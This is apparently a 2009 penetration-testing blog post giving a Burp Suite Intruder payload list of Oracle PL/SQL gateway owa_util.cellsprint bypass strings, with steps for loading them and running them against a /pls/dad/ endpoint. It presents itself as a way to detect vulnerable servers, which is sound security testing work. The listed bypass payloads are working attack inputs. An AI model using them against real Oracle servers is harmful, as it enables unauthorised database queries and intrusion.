Thursday, September 24, 2009

BToD > Intruder & Probing for Oracle's OWA_UTIL stored procedure


Today I am just giving a cheat sheet for loading into Burp via the Intruder > Preset List Payload Set. This list contains known Oracle owa_util.cellsprint bypasses (minus the first one). This way you can detect whether or not you have a vulnerable stored procedure. Probably not a good idea to have the PL/SQL gateway out in the open but if it is now you can detect whether or not its easily exploited.

The preset list contains:

owa_util.cellsprint?p_thequery=select+1+from+dual
%0Aowa_util.cellsprint?p_thequery=select+1+from+dual
S%FFS.owa_util.cellsprint?p_thequery=select+1+from+dual
*SYS*.owa_util.cellsprint?p_thequery=select+1+from+dual
<<"LBL">>owa_util.cellsprint?p_thequery=select+1+from+dual

NOTE: STRIP THE QUOTATION MARKS OUT FROM ENCLOSING LBL SO IT IS ONLY LBL. I just had to enclose them to bypass blogspot's filter.


So create a notepad file containing this list. Send request for http://server.example.com/pls/dad/vulnerable_procedure into Intruder.

Navigate to Intruder > Positions and add position markers around vulnerable_procedure like so:




Navigate to > Payload Preset List and click 'load':




 Open the oracle payload file:





Then start!




If you have a 403 response you know you won't be able to access this. Otherwise, game on.


Happy Hacking!
cktricky

No comments: